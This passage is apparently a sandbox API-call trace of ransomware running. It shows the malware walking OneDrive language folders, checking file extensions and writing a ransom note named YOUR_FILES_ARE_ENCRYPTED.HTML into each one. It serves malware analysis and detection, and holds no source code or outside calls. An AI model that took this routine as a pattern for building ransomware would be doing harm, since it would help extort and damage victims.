lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\km-kh\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\km-kh\\*" [0112.485] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\km-kh\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee3f513b, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xee3f513b, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xeea3742a, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc42be55, cFileName=".", cAlternateFileName="")) returned 0x626638 [0112.488] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee3f513b, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xee3f513b, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xeea3742a, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc42be55, cFileName="..", cAlternateFileName="")) returned 1 [0112.488] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeea3742a, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xeea3742a, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xef0c5c11, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x156c0, dwReserved0=0x19e010, dwReserved1=0xfc42be55, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0112.488] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.488] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\km-kh\\FileSync.LocalizedResources.dll.mui") returned 117 [0112.488] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.488] lstrlenW (lpString=".mui") returned 4 [0112.488] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.488] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeea3742a, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xeea3742a, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xef0c5c11, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x156c0, dwReserved0=0x19e010, dwReserved1=0xfc42be55, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0112.488] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0112.488] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\km-kh\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0112.488] GetProcessHeap () returned 0x600000 [0112.488] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d020 [0112.488] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\km-kh\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_2\\km-kh\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0112.489] WriteFile (in: hFile=0x330, lpBuffer=0x315d020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d020*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0112.490] CloseHandle (hObject=0x330) returned 1 [0112.490] GetProcessHeap () returned 0x600000 [0112.490] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d020 | out: hHeap=0x600000) returned 1 [0112.490] GetProcessHeap () returned 0x600000 [0112.490] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0112.491] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef1846bf, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xef1846bf, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xef1846bf, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="kn", cAlternateFileName="")) returned 1 [0112.491] StrStrIW (lpFirst="kn", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.491] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\kn") returned 78 [0112.491] GetProcessHeap () returned 0x600000 [0112.491] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0112.492] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\kn" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\kn") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\kn" [0112.492] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\kn", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\kn\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\kn\\*" [0112.492] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\kn\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef1846bf, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xef1846bf, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf0497564, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc42be55, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0112.493] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef1846bf, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xef1846bf, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf0497564, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc42be55, cFileName="..", cAlternateFileName="")) returned 1 [0112.493] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf0497564, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf0497564, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf0dfa874, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x172c0, dwReserved0=0x19e010, dwReserved1=0xfc42be55, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0112.493] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.493] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\kn\\FileSync.LocalizedResources.dll.mui") returned 114 [0112.493] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.493] lstrlenW (lpString=".mui") returned 4 [0112.493] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.493] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf0497564, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf0497564, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf0dfa874, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x172c0, dwReserved0=0x19e010, dwReserved1=0xfc42be55, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0112.493] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0112.493] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\kn\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0112.493] GetProcessHeap () returned 0x600000 [0112.493] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d020 [0112.493] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\kn\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_2\\kn\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0112.494] WriteFile (in: hFile=0x330, lpBuffer=0x315d020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d020*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0112.495] CloseHandle (hObject=0x330) returned 1 [0112.495] GetProcessHeap () returned 0x600000 [0112.495] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d020 | out: hHeap=0x600000) returned 1 [0112.495] GetProcessHeap () returned 0x600000 [0112.495] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0112.496] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0e933a5, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf0e933a5, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf0e933a5, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ko", cAlternateFileName="")) returned 1 [0112.496] StrStrIW (lpFirst="ko", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.496] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ko") returned 78 [0112.496] GetProcessHeap () returned 0x600000 [0112.496] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0112.497] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ko" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ko") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ko" [0112.497] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ko", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ko\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ko\\*" [0112.497] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ko\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0e933a5, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf0e933a5, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf1bfc6d0, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc42be55, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0112.498] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0e933a5, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf0e933a5, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf1bfc6d0, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc42be55, cFileName="..", cAlternateFileName="")) returned 1 [0112.498] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1bfc6d0, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf1bfc6d0, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf1f43a35, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0xf2c0, dwReserved0=0x19e010, dwReserved1=0xfc42be55, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0112.498] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.498] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ko\\FileSync.LocalizedResources.dll.mui") returned 114 [0112.498] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.498] lstrlenW (lpString=".mui") returned 4 [0112.498] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.498] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1bfc6d0, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf1bfc6d0, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf1f43a35, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0xf2c0, dwReserved0=0x19e010, dwReserved1=0xfc42be55, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0112.499] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0112.499] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ko\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0112.499] GetProcessHeap () returned 0x600000 [0112.499] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d020 [0112.499] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ko\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_2\\ko\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0112.499] WriteFile (in: hFile=0x330, lpBuffer=0x315d020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d020*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0112.500] CloseHandle (hObject=0x330) returned 1 [0112.500] GetProcessHeap () returned 0x600000 [0112.500] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d020 | out: hHeap=0x600000) returned 1 [0112.500] GetProcessHeap () returned 0x600000 [0112.500] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0112.503] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf2002503, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf2002503, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf2002503, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="kok", cAlternateFileName="")) returned 1 [0112.504] StrStrIW (lpFirst="kok", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.504] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\kok") returned 79 [0112.504] GetProcessHeap () returned 0x600000 [0112.504] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0112.505] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\kok" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\kok") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\kok" [0112.505] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\kok", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\kok\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\kok\\*" [0112.505] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\kok\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf2002503, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf2002503, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf223ea69, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc42be55, cFileName=".", cAlternateFileName="")) returned 0x626978 [0112.505] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf2002503, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf2002503, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf223ea69, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc42be55, cFileName="..", cAlternateFileName="")) returned 1 [0112.506] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf223ea69, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf223ea69, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf24ed57a, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x156c0, dwReserved0=0x19e010, dwReserved1=0xfc42be55, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0112.506] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.506] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\kok\\FileSync.LocalizedResources.dll.mui") returned 115 [0112.506] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.506] lstrlenW (lpString=".mui") returned 4 [0112.506] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.506] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf223ea69, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf223ea69, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf24ed57a, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x156c0, dwReserved0=0x19e010, dwReserved1=0xfc42be55, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0112.506] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0112.506] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\kok\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 109 [0112.506] GetProcessHeap () returned 0x600000 [0112.506] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d020 [0112.506] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\kok\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_2\\kok\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0112.507] WriteFile (in: hFile=0x330, lpBuffer=0x315d020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d020*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0112.508] CloseHandle (hObject=0x330) returned 1 [0112.508] GetProcessHeap () returned 0x600000 [0112.508] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d020 | out: hHeap=0x600000) returned 1 [0112.508] GetProcessHeap () returned 0x600000 [0112.508] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0112.509] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf25ac394, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf25ac394, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf25ac394, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ku-arab", cAlternateFileName="")) returned 1 [0112.509] StrStrIW (lpFirst="ku-arab", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.509] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ku-arab") returned 83 [0112.509] GetProcessHeap () returned 0x600000 [0112.509] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0112.510] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ku-arab" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ku-arab") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ku-arab" [0112.510] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ku-arab", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ku-arab\\*") 